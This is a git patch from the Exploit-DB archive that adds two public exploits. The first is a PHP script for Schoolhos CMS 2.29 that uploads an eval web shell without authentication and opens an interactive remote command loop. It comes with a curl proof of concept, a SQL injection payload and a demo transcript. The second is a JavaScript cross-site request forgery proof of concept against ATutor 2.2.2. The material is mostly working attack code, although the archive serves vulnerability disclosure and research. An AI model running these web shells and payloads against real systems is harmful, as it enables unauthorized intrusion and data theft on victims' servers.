From 38e316551e27ef56b430b49c427848bdca39c200 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Mon, 14 Nov 2016 05:01:21 +0000
Subject: [PATCH] DB: 2016-11-14

2 new exploits

Schoolhos CMS 2.29 - Remote Code Execution / SQL Injection
ATutor 2.2.2 - Cross-Site Request Forgery (Add New Course)
---
 files.csv                        |   2 +
 platforms/php/webapps/40753.php  | 165 +++++++++++++++++++++++
 platforms/php/webapps/40755.html | 217 +++++++++++++++++++++++++++++++
 3 files changed, 384 insertions(+)
 create mode 100755 platforms/php/webapps/40753.php
 create mode 100755 platforms/php/webapps/40755.html

diff --git a/files.csv b/files.csv
index a44aa2a73..8bf586700 100755
--- a/files.csv
+++ b/files.csv
@@ -36808,3 +36808,5 @@ id,file,description,date,author,platform,type,port
 40749,platforms/php/webapps/40749.txt,"MyBB 1.8.6 - Cross-Site Scripting",2016-11-10,"Curesec Research Team",php,webapps,80
 40750,platforms/php/webapps/40750.txt,"4Images 1.7.13 - SQL Injection",2016-11-10,0x4148,php,webapps,0
 40751,platforms/php/webapps/40751.txt,"vBulletin 4.2.3 - 'ForumRunner' SQL Injection",2015-08-25,"Manish Tanwar",php,webapps,0
+40753,platforms/php/webapps/40753.php,"Schoolhos CMS 2.29 - Remote Code Execution / SQL Injection",2016-11-13,0x4148,php,webapps,0
+40755,platforms/php/webapps/40755.html,"ATutor 2.2.2 - Cross-Site Request Forgery (Add New Course)",2016-11-13,"Saravana Kumar",php,webapps,0
diff --git a/platforms/php/webapps/40753.php b/platforms/php/webapps/40753.php
new file mode 100755
index 000000000..e42662367
--- /dev/null
+++ b/platforms/php/webapps/40753.php
@@ -0,0 +1,165 @@
+<?php
+/*
+Software : Schoolhos CMS 2.29
+Home : http://www.schoolhos.com/
+Author : Ahmed sultan (0x4148)
+Email : 0x4148@gmail.com
+Home : 0x4148.com
+
+Intro
+Schoolhos CMS is alternative to developing School Website. It's Free and Open Source under GPL License. Easy to install, user friendly and elegant design.
+
+Schoolhos is vulnerable to unauthenticated remote code execution vulnerability , Unauthenticated sql injection flaws
+
+I - Remote code execution
+	File : process.php
+	Line : 42
+	elseif ($pilih=='guru' AND $untukdi=='upload'){
+	$lokasi_file = $_FILES['fupload']['tmp_name'];
+	$nama_file   = $_FILES['fupload']['name'];
+		UploadMateri($nama_file);
+	
+	File : file_uplaod.php
+	Line : 9
+	function UploadMateri($fupload_name){
+	  //direktori file dari halaman e-elarning
+	  $vdir_upload = "../file/materi/";
+	  $vfile_upload = $vdir_upload . $fupload_name;
+
+	  move_uploaded_file($_FILES["fupload"]["tmp_name"], $vfile_upload);
+	}
+	
+	POC
+	curl -i -s -k  -X 'POST' \
+    -H 'Content-Type: multipart/form-data; boundary=---------------------------26518470919255' \
+    --data-binary $'-----------------------------26518470919255\x0d\x0aContent-Disposition: form-data; name=\"fupload\"; filename=\"0x4148.php\"\x0d\x0aContent-Type: application/x-httpd-php\x0d\x0a\x0d\x0a<?php die(\"0x4148 rule\"); ?>\x0d\x0a-----------------------------26518470919255\x0d\x0a\x0d\x0a' \
+    'http://HOST/PATH/elearningku/proses.php?pilih=guru&untukdi=upload'
+	
+	php file can be ccessed via : http://HOST/PATH/file/materi/0x4148.php
+
+II - Unauthenticated sql injection
+
+	File : elearningku/download.php
+	Line 6
+	$file=mysql_query("SELECT * FROM sh_materi WHERE id_materi='$_GET[id]'");
+	$r=mysql_fetch_array($file);
+	$filename=$r[file_materi];
+
+	  header("Content-Type: octet/stream");
+	  header("Pragma: private"); 
+	  header("Expires: 0");
+	  header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
+	  header("Cache-Control: private",false); 
+	  header("Content-Type: $ctype");
+	  header("Content-Disposition: attachment; filename=\"".basename($filename)."\";" );
+	  header("Content-Transfer-Encoding: binary");
+	  header("Content-Length: ".filesize($dir.$filename));
+	  readfile("$dir$filename");
+
+	POC : versi_2.29/elearningku/download.php?id=-1' union select 1,version(),3,4,5,6,7,8-- -
+	DB version will be showed as filename
+
+Script is really full of injection flaws , mentioning all of it is such waste of time
+
+Full exploitation Demo
+~0x4148fo# php scho.php http://192.168.0.50/lab/scho/versi_2.29/
+[*] Schoolhos CMS 2.29 Remote command execution
+[*] Author : Ahmed sultan (0x4148)
+[*] Connect : 0x4148.com | 0x4148@gmail.com
+
+ + Sending payload to http://192.168.0.50/lab/scho/versi_2.29/
+ + Payload sent successfully
+
+0x4148@http://192.168.0.50/lab/scho/versi_2.29/# dir
+ Volume in drive C is OS_Install
+ Volume Serial Number is D60F-0795
+
+ Directory of C:\xampp\htdocs\lab\scho\versi_2.29\file\materi
+
+11/13/2016  02:03 AM    <DIR>          .
+11/13/2016  02:03 AM    <DIR>          ..
+11/13/2016  02:03 AM                47 0x4148.php
+11/30/2011  06:56 PM             8,522 aku.php
+11/29/2011  02:02 AM                74 Alar Reproduksi.rar
+11/29/2011  02:03 AM                74 albert.rar
+11/29/2011  08:25 PM            12,326 ari.png
+11/29/2011  08:27 PM            12,318 ari.rar
+11/29/2011  06:57 PM                74 cerita.rar
+11/29/2011  08:24 PM                 0 contoh.txt
+11/29/2011  02:05 AM                74 dos.rar
+11/29/2011  02:01 AM                74 English1.rar
+12/12/2011  11:13 AM               117 index.html
+11/29/2011  02:10 AM                74 kekebalantubuh.rar
+11/29/2011  02:11 AM                74 masa jenis.rar
+11/29/2011  02:14 AM                74 office.rar
+11/29/2011  02:06 AM                74 paragraf.rar
+11/29/2011  02:04 AM                74 pemanasan.rar
+11/29/2011  02:00 AM                74 polakalimat.rar
+11/29/2011  02:15 AM                74 prepare.rar
+11/29/2011  02:13 AM                74 proklamator.rar
+11/29/2011  02:12 AM                74 sea games.rar
+11/29/2011  02:05 AM                74 soekarno.rar
+11/29/2011  02:09 AM                74 speaking.rar
+11/29/2011  02:15 AM                74 ulangan INDO.rar
+11/29/2011  02:11 AM                74 volume.rar
+              24 File(s)         34,662 bytes
+               2 Dir(s)  38,197,485,568 bytes free
+
+0x4148@http://192.168.0.50/lab/scho/versi_2.29/# exit
+
+~0x4148fo#
+
+*/
+$host=$argv[1];
+$target="$host/elearningku/proses.php?pilih=guru&untukdi=upload";
+echo "[*] Schoolhos CMS 2.29 Remote command execution\n";
+echo "[*] Author : Ahmed sultan (0x4148)\n";
+echo "[*] Connect : 0x4148.com | 0x4148@gmail.com\n\n";
+echo " + Sending payload to $host\n";
+fwrite(fopen("0x4148.php","w+"),'<?php eval(base64_decode($_POST["0x4148"])); ?>');
+$x4148upload = curl_init(); 
+curl_setopt($x4148upload, CURLOPT_URL, $target);
+curl_setopt($x4148upload, CURLOPT_USERAGENT, "mozilla");
+curl_setopt($x4148upload, CURLOPT_POST, 1);
+curl_setopt($x4148upload, CURLOPT_RETURNTRANSFER, true);
+curl_setopt($x4148upload, CURLOPT_POSTFIELDS,array("fupload"=>"@".realpath("0x4148.php")));
+curl_setopt($x4148upload, CURLOPT_SSL_VERIFYPEER, false);
+curl_setopt($x4148upload, CURLOPT_SSL_VERIFYHOST, 0);
+$result = curl_exec($x4148upload);
+curl_close($x4148upload);
+$x4148request=curl_init();
+curl_setopt($x4148request,CURLOPT_RETURNTRANSFER,1);
+curl_setopt($x4148request,CURLOPT_URL,$host."/file/materi/0x4148.php");
+curl_setopt($x4148request, CURLOPT_POSTFIELDS,"0x4148=".base64_encode("echo '0x4148fo';"));
+curl_setopt($x4148request, CURLOPT_SSL_VERIFYPEER, false);
+curl_setopt($x4148request, CURLOPT_SSL_VERIFYHOST, 0);
+curl_setopt($x4148request,CURLOPT_FOLLOWLOCATION,0);
+curl_setopt($x4148request,CURLOPT_TIMEOUT,20);
+curl_setopt($x4148request, CURLOPT_HEADER, true); 
+$outp=curl_exec($x4148request);
+curl_close($x4148request);
+if(!preg_match("#0x4148fo#",$outp)){
+echo " - Failed :(\n";
+die();
+}
+echo " + Payload sent successfully\n\n";
+while(0<1){
+echo "0x4148@$host# ";
+$command=trim(fgets(STDIN));
+if($command=='exit'){
+die();
+}
+$x4148request=curl_init();
+curl_setopt($x4148request,CURLOPT_RETURNTRANSFER,1);
+curl_setopt($x4148request,CURLOPT_URL,$host."/file/materi/0x4148.php");
+curl_setopt($x4148request, CURLOPT_POSTFIELDS,"0x4148=".urlencode(base64_encode("echo '>>>>>';system('$command');echo '>>>>>';")));
+curl_setopt($x4148request, CURLOPT_SSL_VERIFYPEER, false);
+curl_setopt($x4148request, CURLOPT_SSL_VERIFYHOST, 0);
+curl_setopt($x4148request,CURLOPT_FOLLOWLOCATION,0);
+curl_setopt($x4148request,CURLOPT_TIMEOUT,20);
+curl_setopt($x4148request, CURLOPT_HEADER, true); 
+$outp=curl_exec($x4148request);
+curl_close($x4148request);
+echo explode(">>>>>",$outp)[1]."\n";
+}
+?>
\ No newline at end of file
diff --git a/platforms/php/webapps/40755.html b/platforms/php/webapps/40755.html
new file mode 100755
index 000000000..3fa2d5ade
--- /dev/null
+++ b/platforms/php/webapps/40755.html
@@ -0,0 +1,217 @@
+# Exploit Title: ATutor_2.2.2 Learning Management System 
+# Cross-Site Request Forgery (Add New Course)
+# Date: 13-11-2016
+# Software Link: https://github.com/atutor/ATutor/releases/tag/atutor_2_2_2
+# Vendor: http://www.atutor.ca/
+# Exploit Author: Saravana Kumar
+# Contact: https://facebook.com/06saravanakumar
+# Category: webapps
+# Version: 2.2.2
+# Platform: PHP
+# Tested on: [Kali Linux 2.0 | Windows 7]
+# Email: 06saravanakumar@gmail.com
+# Affected URL:
+http://localhost/ATutor/mods/_core/courses/users/create_course.php
+
+==================================
+Vulnerability Disclosure Timeline:
==================================
2016-11-07: Found the vulnerability and Reported to Vendor.
2016-11-08: Vendor Replied.
2016-11-10: Vendor Fixed the vulnerability.
2016-11-11: Patch released
2016-10-12: Public Disclosure
+
+########################### CSRF PoC ###############################
+ 
+<html>
+   <------ CSRF POC ------>
+  <body>
+    <script>
+      function submitRequest()
+      {
+        var xhr = new XMLHttpRequest();
+        xhr.open("POST", "http://localhost/ATutor/mods/_core/courses/users/create_course.php", true);
+        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
+        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------34481053430281");
+        xhr.withCredentials = true;
+        var body = "-----------------------------34481053430281\r\n" + 
+          "Content-Disposition: form-data; name=\"form_course\"\r\n" + 
+          "\r\n" + 
+          "true\r\n" + 
+          "-----------------------------34481053430281\r\n" + 
+          "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" + 
+          "\r\n" + 
+          "819200\r\n" + 
+          "-----------------------------34481053430281\r\n" + 
+          "Content-Disposition: form-data; name=\"course\"\r\n" + 
+          "\r\n" + 
+          "0\r\n" + 
+          "-----------------------------34481053430281\r\n" + 
+          "Content-Disposition: form-data; name=\"old_access\"\r\n" + 
+          "\r\n" + 
+          "protected\r\n" + 
+          "-----------------------------34481053430281\r\n" + 
+          "Content-Disposition: form-data; name=\"created_date\"\r\n" + 
+          "\r\n" + 
+          "2016-11-07 06:55:20\r\n" + 
+          "-----------------------------34481053430281\r\n" + 
+          "Content-Disposition: form-data; name=\"show_courses\"\r\n" + 
+          "\r\n" + 
+          "0\r\n" + 
+          "-----------------------------34481053430281\r\n" + 
+          "Content-Disposition: form-data; name=\"current_cat\"\r\n" + 
+          "\r\n" + 
+          "0\r\n" + 
+          "-----------------------------34481053430281\r\n" + 
+          "Content-Disposition: form-data; name=\"title\"\r\n" + 
+          "\r\n" + 
+          "Programming Language\r\n" + 
+          "-----------------------------34481053430281\r\n" + 
+          "Content-Disposition: form-data; name=\"pri_lang\"\r\n" + 
+          "\r\n" + 
+          "en\r\n" + 
+          "-----------------------------34481053430281\r\n" + 
+          "Content-Disposition: form-data; name=\"description\"\r\n" + 
+          "\r\n" + 
+          "Python\r\n" + 
+          "-----------------------------34481053430281\r\n" + 
+          "Content-Disposition: form-data; name=\"category_parent\"\r\n" + 
+          "\r\n" + 
+          "0\r\n" + 
+          "-----------------------------34481053430281\r\n" + 
+          "Content-Disposition: form-data; name=\"content_packaging\"\r\n" + 
+          "\r\n" + 
+          "top\r\n" + 
+          "-----------------------------34481053430281\r\n" + 
+          "Content-Disposition: form-data; name=\"rss\"\r\n" + 
+          "\r\n" + 
+          "0\r\n" + 
+          "-----------------------------34481053430281\r\n" + 
+          "Content-Disposition: form-data; name=\"access\"\r\n" + 
+          "\r\n" + 
+          "protected\r\n" + 
+          "-----------------------------34481053430281\r\n" + 
+          "Content-Disposition: form-data; name=\"release_date\"\r\n" + 
+          "\r\n" + 
+          "0\r\n" + 
+          "-----------------------------34481053430281\r\n" + 
+          "Content-Disposition: form-data; name=\"day_release\"\r\n" + 
+          "\r\n" + 
+          "1\r\n" + 
+          "-----------------------------34481053430281\r\n" + 
+          "Content-Disposition: form-data; name=\"month_release\"\r\n" + 
+          "\r\n" + 
+          "1\r\n" + 
+          "-----------------------------34481053430281\r\n" + 
+          "Content-Disposition: form-data; name=\"year_release\"\r\n" + 
+          "\r\n" + 
+          "2016\r\n" + 
+          "-----------------------------34481053430281\r\n" + 
+          "Content-Disposition: form-data; name=\"hour_release\"\r\n" + 
+          "\r\n" + 
+          "0\r\n" + 
+          "-----------------------------34481053430281\r\n" + 
+          "Content-Disposition: form-data; name=\"min_release\"\r\n" + 
+          "\r\n" + 
+          "0\r\n" + 
+          "-----------------------------34481053430281\r\n" + 
+          "Content-Disposition: form-data; name=\"end_date\"\r\n" + 
+          "\r\n" + 
+          "0\r\n" + 
+          "-----------------------------34481053430281\r\n" + 
+          "Content-Disposition: form-data; name=\"day_end\"\r\n" + 
+          "\r\n" + 
+          "1\r\n" + 
+          "-----------------------------34481053430281\r\n" + 
+          "Content-Disposition: form-data; name=\"month_end\"\r\n" + 
+          "\r\n" + 
+          "1\r\n" + 
+          "-----------------------------34481053430281\r\n" + 
+          "Content-Disposition: form-data; name=\"year_end\"\r\n" + 
+          "\r\n" + 
+          "2017\r\n" + 
+          "-----------------------------34481053430281\r\n" + 
+          "Content-Disposition: form-data; name=\"hour_end\"\r\n" + 
+          "\r\n" + 
+          "0\r\n" + 
+          "-----------------------------34481053430281\r\n" + 
+          "Content-Disposition: form-data; name=\"min_end\"\r\n" + 
+          "\r\n" + 
+          "0\r\n" + 
+          "-----------------------------34481053430281\r\n" + 
+          "Content-Disposition: form-data; name=\"setvisual\"\r\n" + 
+          "\r\n" + 
+          "1\r\n" + 
+          "-----------------------------34481053430281\r\n" + 
+          "Content-Disposition: form-data; name=\"banner\"\r\n" + 
+          "\r\n" + 
+          "\x3cp\x3eCan fill content what ever you want.\x3c/p\x3e\r\n" + 
+          "-----------------------------34481053430281\r\n" + 
+          "Content-Disposition: form-data; name=\"initial_content\"\r\n" + 
+          "\r\n" + 
+          "1\r\n" + 
+          "-----------------------------34481053430281\r\n" + 
+          "Content-Disposition: form-data; name=\"quota\"\r\n" + 
+          "\r\n" + 
+          "-2\r\n" + 
+          "-----------------------------34481053430281\r\n" + 
+          "Content-Disposition: form-data; name=\"filesize\"\r\n" + 
+          "\r\n" + 
+          "-3\r\n" + 
+          "-----------------------------34481053430281\r\n" + 
+          "Content-Disposition: form-data; name=\"tracking\"\r\n" + 
+          "\r\n" + 
+          "\r\n" + 
+          "-----------------------------34481053430281\r\n" + 
+          "Content-Disposition: form-data; name=\"copyright\"\r\n" + 
+          "\r\n" + 
+          "\r\n" + 
+          "-----------------------------34481053430281\r\n" + 
+          "Content-Disposition: form-data; name=\"boolForce\"\r\n" + 
+          "\r\n" + 
+          "\r\n" + 
+          "-----------------------------34481053430281\r\n" + 
+          "Content-Disposition: form-data; name=\"icon\"\r\n" + 
+          "\r\n" + 
+          "\r\n" + 
+          "-----------------------------34481053430281\r\n" + 
+          "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" + 
+          "\r\n" + 
+          "819200\r\n" + 
+          "-----------------------------34481053430281\r\n" + 
+          "Content-Disposition: form-data; name=\"customicon\"; filename=\"\"\r\n" + 
+          "Content-Type: application/octet-stream\r\n" + 
+          "\r\n" + 
+          "\r\n" + 
+          "-----------------------------34481053430281\r\n" + 
+          "Content-Disposition: form-data; name=\"custOptCount\"\r\n" + 
+          "\r\n" + 
+          "0\r\n" + 
+          "-----------------------------34481053430281\r\n" + 
+          "Content-Disposition: form-data; name=\"courseId\"\r\n" + 
+          "\r\n" + 
+          "\r\n" + 
+          "-----------------------------34481053430281\r\n" + 
+          "Content-Disposition: form-data; name=\"submit\"\r\n" + 
+          "\r\n" + 
+          "Save\r\n" + 
+          "-----------------------------34481053430281--\r\n";
+        var aBody = new Uint8Array(body.length);
+        for (var i = 0; i < aBody.length; i++)
+          aBody[i] = body.charCodeAt(i); 
+        xhr.send(new Blob([aBody]));
+      }
+    </script>
+    <form action="#">
+ <input type="button" value="Submit request" onclick="submitRequest();" />
+    </form>
+  </body>
+</html>
+
+---------------------------------------------------------------------------
+ 
+Solution:
+ 
+Patch is available. Install patch using the ATutor Patcher.
+
+Link to download patch:
+
+http://update.atutor.ca/patch/2_2_2/2_2_2-6/patch.xml
+---------------------------------------------------------------------------
+